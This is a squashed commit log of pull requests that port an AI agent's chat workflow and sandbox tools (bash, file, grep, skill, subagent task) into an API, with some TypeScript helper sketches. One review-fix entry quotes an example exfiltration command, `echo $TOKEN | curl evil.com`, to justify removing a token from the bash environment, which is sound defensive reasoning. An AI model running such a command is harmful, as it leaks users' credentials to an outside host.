Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581)

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow

Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones (`wrun_<id>`) emitted by the workflow runtime.

Tools are still NOT wired — the workflow runs streamText with the gateway model + Recoup custom instructions only. Sandbox tool surface comes in a follow-up PR.
What's now plumbed end-to-end:
- validateChatWorkflow → session+chat ownership → sandbox active → reconcile existing active_stream_id (resume / 409 / fall-through) → refresh lifecycle activity → fire-and-forget persist user message → start runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) → return run.getReadable() with x-workflow-run-id header

New helpers (Supabase):
- compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id
- touchChat — bump chats.updated_at
- updateChat — generic partial update mirroring updateSession's shape
- createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert
- isFirstChatMessage — true iff exactly one row exists matching messageId

New helpers (chat/recoupable):
- extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased)
- agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt
- persistLatestUserMessage — fire-and-forget user msg + title-from-first-80
- reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop

New workflow files:
- app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper
- app/workflows/runAgentStep.ts — `"use step"`, single streamText turn

Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3 createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest + 6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored). Full suite: 2946/2946 pass, lint clean.

Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools). Without tools, `finishReason` is always "stop" after one turn — the runAgentWorkflow loop shape is in place but only iterates once today.
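For illustration, extractOrgId's `org-<slug>-<uuid>` → lowercased uuid mapping could look like the sketch below. The regex and the `null` return for non-matching input are hypothetical. So is the assumption that the input ends with the `org-<slug>-<uuid>` segment, for example a bare repository name rather than a clone URL with a `.git` suffix.

```typescript
// Matches "...org-<slug>-<uuid>" at the end of the input; the slug may itself
// contain hyphens, so the lazy quantifier expands until a full UUID fits.
const ORG_NAME_PATTERN =
  /org-[a-z0-9-]+?-([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})$/i;

function extractOrgId(name: string): string | null {
  const match = ORG_NAME_PATTERN.exec(name);
  // Lowercase so IDs compare equal regardless of how the repo name was cased.
  return match ? match[1].toLowerCase() : null;
}
```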
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — structural + P1/P2 fixes

Sweetman structural feedback (KISS / OCP):
- Move workflow files: app/workflows/runAgent{Workflow,Step}.ts → app/lib/workflows/runAgent{Workflow,Step}.ts
- Generic Supabase helpers + domain wrappers:
  - Generic `updateChat({filter, updates})` with optional CAS predicate on active_stream_id. Subsumes compareAndSetChatActiveStreamId and touchChat (both deleted).
  - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces domain-specific isFirstChatMessage. The "is earliest?" check now lives in persistLatestUserMessage where it belongs.
  - Rename createChatMessageIfNotExists → `upsertChatMessage` with a discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so callers can tell duplicates from DB errors.
- Extract resume-stream block from handler into `maybeResumeChatStream.ts` (OCP — handler stays small, resume logic grows independently).

cubic P1 fixes:
- CAS-before-start: handler now claims `active_stream_id` with a `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the race where two requests could both bill the model before one lost the CAS. After start(), promotes the placeholder to the real run id.
- updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}` so callers distinguish "race lost" (rowsUpdated:0) from DB errors.
- reconcileExistingActiveStream: bare try/catch on getRun no longer clears stale active_stream_id on transient workflow API failures — we treat any uncertainty as conflict. Failed CAS-clear on a completed run also returns conflict (rather than possibly falling through to ready on a DB read error).
- await getRun(runId).cancel() in handler — previously synchronous + unawaited cancellation could escape the try/catch.

cubic P2 fixes:
- updateChat updates parameter narrowed to `ChatMutableFields` (excludes id, session_id, created_at).
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to body-budget = max - suffix.
- runAgentStep: acquire writer once, release in finally. Per-chunk writer acquisition could leak the lock on write failure.
- runAgentWorkflow: capped at a single turn until messages threading lands with tool ports (PR 4). Multi-turn loop with the same input was unsafe — log+warn if model returns tool-calls and exit.

Tests reworked: 231 in the touched files all green; full suite 2949/2949; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): top-level import in reconcileExistingActiveStream

The dynamic `await import("workflow/api")` inside the function body was a carry-over from open-agents — handleChatWorkflowStream.ts already top-level imports `start` and `getRun` from the same package, so there's no reason for the lib to defer. Moving to a normal top-level import for consistency.

Also tightens the cancel-throws handler test to use the same deferred-rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's unhandled-rejection watcher doesn't trip on the mock setup.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): move active_stream_id CAS out of supabase lib

Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific predicate logic doesn't belong in the Supabase plumbing. Restructured:
- `lib/supabase/chats/updateChat.ts` now generic. The filter accepts `where: Partial<Tables<"chats">>` (a generic predicate that maps to `column = value` or `column IS NULL`) so no column name is hardcoded in the Supabase lib.
- `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper. Owns the "compare-and-set on active_stream_id" concept and returns a discriminated `{ok, claimed} | {ok: false, error}` result.
  Handler and reconcileExistingActiveStream both compose against this wrapper instead of constructing predicates inline.
- Handler + reconcile updated to use the wrapper. Tests follow.

37/37 tests in touched files pass; full suite 2955/2955; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth

Two production-build issues surfaced by Vercel that local pnpm test + tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's errors were all in __tests__ unrelated to this PR).

1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }` narrowing wasn't kicking in under Next.js's strict TS plugin. Switched to `if ("error" in result)` (in-operator narrowing) which reliably discriminates the union members regardless of literal-type inference quirks.

2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...).update(...).eq(...)` + reassignment in a `for` loop (`.is()` / `.eq()` per where entry) caused "type instantiation is excessively deep" — Supabase's PostgrestFilterBuilder is heavily generic and the reassignment kept expanding the type. Rewrote as: split where map into equality matches (one `.match(obj)` call) + nullable columns (reduced with `.is(col, null)` typed back to the original builder).

Both bugs were behavior-neutral — the function shape and contract are unchanged.

37/37 tests in touched files green; full suite 2955/2955; lint clean; `pnpm build` now succeeds.
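Here is a sketch of the compare-and-set wrapper and the `"error" in result` narrowing from the build fix. `UpdateActiveStream` and `inMemoryChats` are hypothetical stand-ins for the generic updateChat call, which would issue an UPDATE filtered on both `id` and the expected `active_stream_id`. Zero rows updated is read as a lost race, matching the `{ok, rowsUpdated}` contract described above.

```typescript
// Discriminated result shapes, following the commit message.
type UpdateResult = { ok: true; rowsUpdated: number } | { ok: false; error: string };
type CasResult = { ok: true; claimed: boolean } | { ok: false; error: string };

// Hypothetical stand-in for updateChat: conceptually
// UPDATE chats SET active_stream_id = next WHERE id = chatId AND active_stream_id = expected.
type UpdateActiveStream = (
  chatId: string,
  expected: string | null,
  next: string | null,
) => UpdateResult;

function compareAndSetChatActiveStreamId(
  update: UpdateActiveStream,
  chatId: string,
  expected: string | null,
  next: string | null,
): CasResult {
  const result = update(chatId, expected, next);
  // `in`-operator narrowing: discriminates the union without depending on
  // how the literal type of `ok` was inferred.
  if ("error" in result) return { ok: false, error: result.error };
  // Zero rows means another request changed the column first.
  return { ok: true, claimed: result.rowsUpdated > 0 };
}

// In-memory table used only to exercise the wrapper.
function inMemoryChats(initial: Record<string, string | null>): UpdateActiveStream {
  const rows = new Map(Object.entries(initial));
  return (chatId, expected, next) => {
    if (!rows.has(chatId) || rows.get(chatId) !== expected) return { ok: true, rowsUpdated: 0 };
    rows.set(chatId, next);
    return { ok: true, rowsUpdated: 1 };
  };
}
```

With a `pending-<uuid>` placeholder as `next` and `null` as `expected`, the first request claims the chat and a concurrent second one sees `claimed: false`.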
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583)

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim)

Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it through the workflow via streamText's `experimental_context`. Proves the entire tool-execution machinery works end-to-end. The remaining 10 tools (read, write, grep, glob, todo, task, ask_user_question, skill, fetch + utils) port in a follow-up; this PR's scope was deliberately held to one tool so the wire-up is reviewable in isolation.

New files:
- lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard, getSandbox() that reconnects via connectVercel(state) per call.
- lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN, RECOUP_ORG_ID } env builder from context.
- lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts adapted to api's Sandbox interface. Injects recoup env on foreground execs only (detached processes outlive the prompt → no token).
- lib/agent/buildAgentTools.ts — factory returning the agent's tool record. Adding the remaining tools is a one-line append to this map.

Wire-up:
- runAgentStep now accepts `agentContext`, passes into streamText as experimental_context, and uses streamText's internal multi-step loop (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop in runAgentWorkflow needed.
- handleChatWorkflowStream derives recoupOrgId from session.clone_url via extractOrgId, builds AgentContext with session.sandbox_state + validated.authToken, passes to start(workflow).

Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory + 3 workflow file updates picked up by existing tests). Full suite 2978/2978 pass; lint clean; production build succeeds.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure

Sweetman KISS/SRP feedback (4 comments):
- Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's default stop condition handles tool-call iteration without an arbitrary cap that could silently truncate the only workflow turn.
- Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from bashTool. All model-issued commands are trusted in this PR — host-side gating belongs at the route/UI layer if it ever returns.
- Removed `needsApproval` from bashTool entirely (subsumes cubic P1 about the broken override ordering — the gate itself is gone).
- Split `lib/agent/tools/utils.ts` into per-function files:
  - `AgentContext.ts` — type
  - `isAgentContext.ts` — guard
  - `getSandbox.ts` — sandbox reconnection

  No catch-all utils file.

Cubic feedback:
- **P0**: Removed `recoupAccessToken` from AgentContext + handler + buildRecoupExecEnv. Handing the long-lived api key to bash would let any model-issued command exfiltrate it via env (`echo $TOKEN | curl evil.com`). Slim PR 4 has no actual consumer for the token — only the future `skill` tool needs it. Proper short-lived token minting will land alongside that port.
- **P2** (`isAgentContext` too weak): tightened the guard to validate sandbox.state is a non-null object AND sandbox.workingDirectory is a non-empty string. Earlier guard returned true for `{ sandbox: {} }`, letting tools later crash on undefined fields.
- P1 + P2 about stopWhen / needsApproval: resolved by sweetman's deletions above.
- P2 (test file >100 lines): dismissed — same as PR 3 review. The repo has no enforced max-lines rule; existing tests routinely exceed 700 lines.

Tests updated for the new shape. 25 tests in touched files green (8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv + 2 factory). Full suite 2980/2980 pass; lint clean; production build succeeds.
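The tightened isAgentContext guard (non-null `sandbox.state` object, non-empty `sandbox.workingDirectory` string) might be written along these lines. The `AgentContext` shape here is reduced to the fields the guard checks. It is a hypothetical simplification, not the repo's full type.

```typescript
// Reduced shape: only the fields the guard validates (other fields omitted).
interface AgentContext {
  sandbox: {
    state: Record<string, unknown>;
    workingDirectory: string;
  };
}

function isRecord(value: unknown): value is Record<string, unknown> {
  return typeof value === "object" && value !== null;
}

function isAgentContext(value: unknown): value is AgentContext {
  if (!isRecord(value)) return false;
  const sandbox = value.sandbox;
  if (!isRecord(sandbox)) return false;
  const workingDirectory = sandbox.workingDirectory;
  // Rejects `{ sandbox: {} }`, null state, and empty working directories.
  return isRecord(sandbox.state) && typeof workingDirectory === "string" && workingDirectory.length > 0;
}
```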
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow

Per discussion on PR #583. Restoring the streamText stop condition so the workflow agent gets the model wrap-up turn after a tool call (model → tool → tool-result → model → text response), instead of stopping at streamText's default `stepCountIs(1)` after the first tool call.

DRY by sharing one constant between the two chat endpoints:
- New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts. Inherits the value that /api/chat already uses (originally hardcoded in getGeneralAgent.ts:55) — high enough that normal flows never hit the cap but bounds runaway loops for cost / replay safety.
- lib/agents/generalAgent/getGeneralAgent.ts: imports the constant instead of constructing stepCountIs(111) inline.
- app/lib/workflows/runAgentStep.ts: imports the constant, passes to streamText as `stopWhen`.

Single-shot agents (createCompactAgent, createContentPromptAgent, createEmailReplyAgent) intentionally keep their local `stepCountIs(1)` — they're not in the multi-step chat family.

Full suite 2980/2980 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585)

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5)

Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools from open-agents/packages/agent/tools/. Each is a direct port adapted to api's Sandbox interface, registered in buildAgentTools, and ready for the agent to invoke through the existing experimental_context plumbing.
New tool files (one tool per file, per sweetman SRP):
- readFileTool.ts — read with 1-indexed offset/limit, numbered output
- writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile
- editFileTool.ts — exact-string replace, ambiguous-match rejection
- grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200
- globTool.ts — find -printf with mtime sort, GNU/BSD-compatible
- todoWriteTool.ts — stateless planning surface; echoes the list back
- webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB

New helpers (utilities used by multiple tools):
- shellEscape.ts — `'` → `'\''` dance
- toDisplayPath.ts — absolute → relative-when-inside-workdir display path

buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite tools (`task`, `ask_user_question`, `skill`) need subagent context / UI rendering / skill discovery infrastructure not in api today and land in a follow-up PR.

Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite 3014/3014; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers)

Per PR 585 review question — most tools were defined as `() => tool({...})` factories while two (todoWriteTool, webFetchTool) were direct values. The split was a vestigial copy from open-agents where the factory pattern only made sense for tools that took options (originally bash's ToolOptions, which sweetman had me remove in PR 4 review). AI SDK's `tool()` helper returns a plain value with no per-call state, so the factory wrappers added nothing.

Harmonized to direct-value exports across all 8 tools:
- bashTool, readFileTool, writeFileTool, editFileTool, grepTool, globTool: dropped the `() =>` wrapper.
- buildAgentTools.ts: dropped the matching `()` calls.
- 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly).
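The two shared helpers are small enough to sketch in full. shellEscape wraps a value in single quotes and rewrites each embedded `'` as `'\''`. toDisplayPath strips the working-directory prefix when a path is inside it. Returning `"."` for the working directory itself and tolerating a trailing slash on it are assumptions about the ported code, not confirmed behavior.

```typescript
// Quote a value for POSIX sh. Inside single quotes nothing is special except
// the closing quote, so each embedded ' closes the run, emits \', and reopens.
function shellEscape(value: string): string {
  return `'${value.replace(/'/g, `'\\''`)}'`;
}

// Show paths inside the working directory relative to it; leave others absolute.
function toDisplayPath(absolutePath: string, workingDirectory: string): string {
  const root = workingDirectory.replace(/\/+$/, "");
  if (absolutePath === root) return ".";
  // Require the separator so "/work" does not match "/workspace/...".
  if (absolutePath.startsWith(`${root}/`)) return absolutePath.slice(root.length + 1);
  return absolutePath;
}
```

A tool would interpolate `shellEscape(pattern)` directly into a command string, such as the `grep -rn` invocation, so a model-supplied pattern containing quotes or `$` cannot break out of its argument.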
Full suite 3014/3014 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587)

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim)

Ports the `skill` composite tool from open-agents along with the skill discovery layer it depends on. The handler now connects to the sandbox before workflow start, scans `${workingDirectory}/skills/` for project-level skills, and threads the catalog into the workflow via `AgentContext.skills`. The `skill` tool is registered in `buildAgentTools` only when the catalog is non-empty — so models in sandboxes without skills never see the tool.

New skills layer (lib/skills/):
- skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema, frontmatterToOptions (Zod schema + camelCase normalization)
- parseSkillFrontmatter.ts — hand-rolled YAML subset parser (key:value, quoted strings, booleans; preserves colons in URLs)
- extractSkillBody.ts — strip frontmatter, return body
- substituteArguments.ts — $ARGUMENTS replacement
- injectSkillDirectory.ts — prepend `Skill directory: <path>`
- discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name, drop names that shadow built-in /model /resume /new
- getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]` only. Global skills (~/.skills) port later alongside short-lived token minting.

New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup, respects `disable-model-invocation`, surfaces available-skills list on unknown name. Loads SKILL.md content, applies extractSkillBody → injectSkillDirectory → substituteArguments, returns to the model.
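The skill tool's content pipeline (extractSkillBody → injectSkillDirectory → substituteArguments) could be composed roughly as below. The frontmatter regex, the blank line after the `Skill directory:` header, replacing every `$ARGUMENTS` occurrence and the `renderSkill` wrapper are all hypothetical. split/join is used so that `$` sequences in the arguments are not interpreted as replacement patterns.

```typescript
// Drop a leading frontmatter block delimited by "---" lines, if present.
function extractSkillBody(content: string): string {
  const frontmatter = /^---\r?\n[\s\S]*?\r?\n---\r?\n?/.exec(content);
  return frontmatter ? content.slice(frontmatter[0].length) : content;
}

// Prefix the header naming the skill directory (header text from the commit message).
function injectSkillDirectory(body: string, skillDirectory: string): string {
  return `Skill directory: ${skillDirectory}\n\n${body}`;
}

// Replace every $ARGUMENTS placeholder literally (no regex replacement patterns).
function substituteArguments(body: string, args: string): string {
  return body.split("$ARGUMENTS").join(args);
}

// Hypothetical wrapper applying the three steps in the documented order.
function renderSkill(content: string, skillDirectory: string, args: string): string {
  return substituteArguments(injectSkillDirectory(extractSkillBody(content), skillDirectory), args);
}
```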
Wire-up:
- AgentContext gains `skills?: SkillMetadata[]`
- buildAgentTools accepts `{ skills }`, registers skill tool when non-empty
- runAgentStep passes `agentContext.skills` to buildAgentTools
- handleChatWorkflowStream connects sandbox + discoverSkills before start(workflow); empty catalog on discovery failure (best-effort, never blocks the request)

Slim scope decisions:
- Project skills only (no global ~/.skills/ scan yet)
- No short-lived token minting; the recoup-api skill would still load + return content, but its curl examples wouldn't authenticate without ad-hoc credentials. Token minting becomes a separate PR where it can be designed properly (Privy JWT vs server-minted JWT scoped to accountId + sandbox session).

Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2 injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills + 7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(skills): match open-agents 3-path scan (was scanning the wrong dir)

The slim getSandboxSkillDirectories looked at `${workingDirectory}/skills/` — a path that doesn't exist in real recoupable sandboxes. The actual layout (mirrored from open-agents/apps/web/lib/skills/directories.ts):
- `${workingDirectory}/.claude/skills/` (project, claude-style)
- `${workingDirectory}/.agents/skills/` (project, agents-style)
- `${HOME}/.agents/skills/` (global; populated at provisioning by installSessionGlobalSkills)

Also drops the earlier deferral comment: global skills load fine WITHOUT short-lived token minting. The skill tool returns SKILL.md content to the model; only the curl examples *inside* SKILL.md need auth credentials, and those can be supplied ad-hoc until proper token minting lands.
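To illustrate the hand-rolled YAML subset parser (key: value pairs, quoted strings, booleans, colons preserved in values such as URLs), here is a hypothetical parseSkillFrontmatter. It splits each line on its first colon only. Nesting, lists and multi-line values are deliberately unsupported, and the flat `Record<string, string | boolean>` return shape is an assumption.

```typescript
type FrontmatterValue = string | boolean;

function parseSkillFrontmatter(content: string): Record<string, FrontmatterValue> {
  const block = /^---\r?\n([\s\S]*?)\r?\n---/.exec(content);
  const result: Record<string, FrontmatterValue> = {};
  if (!block) return result;

  for (const line of block[1].split(/\r?\n/)) {
    // Skip blank lines and YAML comments.
    if (/^\s*(#|$)/.test(line)) continue;
    // Split on the FIRST colon only, so "homepage: https://x" keeps "https://x".
    const colon = line.indexOf(":");
    if (colon <= 0) continue;
    const key = line.slice(0, colon).trim();
    const raw = line.slice(colon + 1).trim();

    if (raw === "true" || raw === "false") {
      result[key] = raw === "true";
      continue;
    }
    // Strip one pair of matching surrounding quotes, if present.
    const quoted = /^(["'])(.*)\1$/.exec(raw);
    result[key] = quoted ? quoted[2] : raw;
  }
  return result;
}
```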
Changes:
- getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory to find the sandbox's actual $HOME — defaults to /root)
- exports the two sub-functions (getProjectSkillDirectories + getGlobalSkillsDirectory) so they're individually testable
- Handler awaits the async path resolution
- New test suite covers all 3 paths + $HOME variants

Caught by sweetman pointing out that this same repo (org-rostrum-pacific) DOES show skills in open-agents — proving the slim deferral was wrong.

Full suite 3053/3053; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback)

Two changes per user direction:

1. **YAGNI: drop project-skill directory scanning.** All skills are provisioned globally via `installSessionGlobalSkills` at sandbox startup — org repos do NOT bundle their own skill directories. getSandboxSkillDirectories now returns just the single global path: `${HOME}/.agents/skills`. Deleted getProjectSkillDirectories and the PROJECT_SKILL_BASE_FOLDERS array.

2. **SRP: extract getSkills into its own file.** Previously inline in skillTool.ts (per sweetman comment on PR 587). Now lives at lib/skills/getSkills.ts with its own tests. Future skill-aware consumers (e.g. system-prompt builders) share the same accessor instead of duplicating the context-cast.

Verified live on preview against `recoupable/org-rostrum-pacific-...` BEFORE this commit:
- Sandbox provisioning installs 2 globals at /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace)
- Agent invoked `skill({ skill: "recoup-api" })` successfully, received 11,173 chars of SKILL.md content with the correct "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api" header

Full suite 3055/3055; lint clean; production build succeeds.
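After the YAGNI change the scan list reduces to the single global directory. Below is a sketch of getGlobalSkillsDirectory that tolerates a trailing slash on the home directory, one of the test cases listed for it. Taking the home directory as a plain string is an assumption. The real getSandboxSkillDirectories is described as async, because it resolves `$HOME` inside the sandbox, and is synchronous here only for brevity.

```typescript
// Global skills live under the sandbox user's home directory.
function getGlobalSkillsDirectory(homeDirectory: string): string {
  // Tolerate "/root/" as well as "/root" so the join never produces "//".
  const home = homeDirectory.replace(/\/+$/, "");
  return `${home}/.agents/skills`;
}

// Synchronous stand-in: after the YAGNI change, only the global path is scanned.
function getSandboxSkillDirectories(homeDirectory: string): string[] {
  return [getGlobalSkillsDirectory(homeDirectory)];
}
```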
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory

Per sweetman PR review (comments r3283710486 and r3283762023). Each helper now lives in its own file with its own focused test suite:
- lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts
  - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null when neither exists)
- lib/skills/getGlobalSkillsDirectory.ts — was inlined in getSandboxSkillDirectories.ts
  - 2 new unit tests (standard path, trailing-slash tolerance)

discoverSkills now imports findSkillFile. getSandboxSkillDirectories imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories test loses its inline getGlobalSkillsDirectory cases (those moved to the dedicated test file).

Full suite passes; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7) (#589)

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7)

Completes the open-agents tool surface. The agent now has all 11 tools.

**ask_user_question** (lib/agent/tools/askUserQuestionTool.ts) — client-side tool with NO server execute. Schema mirrors open-agents verbatim (questions array, options with label/description, multiSelect flag, max 12-char header). streamText halts after emitting the tool-call because there's no result to feed back; the chat UI renders the question component, collects answers, and submits them in the next workflow request's messages array. No WDK pause/resume hook needed.

**task** (lib/agent/tools/taskTool.ts) — slim port of open-agents' multi-type SUBAGENT_REGISTRY → one generic subagent. Runs a sub-`streamText` loop with a curated subagent tool set (`read, write, edit, grep, glob, bash`) matching open-agents' `executor` subagent.
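One way to express the curated subagent tool set is an allow-list filter over the parent's tool record. This sketch assumes buildSubagentTools derives its subset from an existing record keyed by the tool names listed above. The repo's version may import the tool values directly instead, and the tool values are treated as opaque here. Because `task` is never on the list, subagents stay leaves of the agent tree.

```typescript
type ToolRecord = Record<string, unknown>;

// Mirrors the executor-style set listed in the commit message.
const SUBAGENT_TOOL_NAMES = ["read", "write", "edit", "grep", "glob", "bash"] as const;

function buildSubagentTools(parentTools: ToolRecord): ToolRecord {
  const subset: ToolRecord = {};
  for (const name of SUBAGENT_TOOL_NAMES) {
    // Allow-list, not deny-list: task, ask_user_question, skill, todo_write and
    // web_fetch are excluded simply by never being named here.
    if (name in parentTools) subset[name] = parentTools[name];
  }
  return subset;
}
```

An allow-list also means any tool added to the parent later stays out of subagents unless someone opts it in explicitly.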
The subagent tool set deliberately EXCLUDES:
- task (recursion guard — open-agents' three subagent types executor/explorer/design all explicitly omit task too; subagents are leaves of the agent tree)
- ask_user_question, skill, todo_write, web_fetch (parity with open-agents subagent curation; subagents run autonomously, don't plan from scratch, don't make web calls, don't load further skills)

AgentContext gains `modelId?: string` so the subagent can use the same model as its parent. Handler populates it from chat.model_id or the platform default.

buildAgentTools registers both new tools unconditionally (skill stays conditional on a non-empty catalog).

Quirk: api's AI SDK (6.0.0-beta.122) calls toModelOutput(output) directly, NOT toModelOutput({ output }) as open-agents' newer 6.0.165 does. askUserQuestionTool uses the direct signature.

Tests: 9 askUserQuestionTool + 6 taskTool + updated buildAgentTools + AgentContext updates. Full suite 3075/3075 pass, lint clean, production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(task-tool): provide non-empty subagent prompt

The subagent's streamText was invoked with messages: [] and only a system prompt, so the AI SDK recorded zero steps and threw NoOutputGeneratedError — surfaced to the parent as "Subagent failed: No output generated. Check the stream for errors."

Pass an explicit user-side trigger prompt, mirroring open-agents' task tool. Adds a regression test that asserts streamText receives either a non-empty prompt or non-empty messages.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(task-tool): extract buildSubagentTools (SRP) + drop modelId from AgentContext (KISS)

Address PR review feedback:
- SRP: move buildSubagentTools to lib/agent/tools/buildSubagentTools.ts (one exported function per file).
- KISS: open-agents' AgentContext type does not have modelId — it uses model: LanguageModel / subagentModel?: LanguageModel.
  api can't follow that exact shape because agentContext is part of a durable Vercel Workflow input and LanguageModel objects aren't JSON-serializable. Instead of inventing modelId on AgentContext, hardcode a default subagent model id in taskTool. A subagentModelId override field can be added if/when a real consumer needs it.

Also format-fixes askUserQuestionTool.ts toModelOutput arrow (parentheses around single param flagged by prettier in CI).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent): align AgentContext + model resolution with open-agents

Match open-agents' `tools/utils.ts` + `types.ts` shape so the subagent inherits the parent's model (rather than the previous hardcoded SUBAGENT_MODEL_ID):
- AgentContext gains `model: LanguageModel` (required) and `subagentModel?: LanguageModel`, mirroring open-agents.
- Introduce DurableAgentContext = Omit<AgentContext, "model" | "subagentModel"> for the workflow input shape, since LanguageModel instances aren't JSON-serializable and can't ride durable Vercel Workflow inputs.
- runAgentStep constructs `callModel = gateway(input.modelId)` once per step and merges it into experimental_context — same pattern as open-agents' prepareCall in open-harness-agent.ts.
- New getMainModel / getSubagentModel helpers (SRP, one per file) mirror open-agents' utility functions: getSubagentModel returns `ctx.subagentModel ?? ctx.model`.
- taskTool drops the hardcoded SUBAGENT_MODEL_ID; calls getSubagentModel(experimental_context, "task") instead — subagent now defaults to the same model the parent is running.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): emit per-message cost/usage metadata (cutover Bundle C) (#592)

* feat(chat-workflow): emit per-message cost/usage metadata (Bundle C)

First step in the open-agents → api cutover sequence.
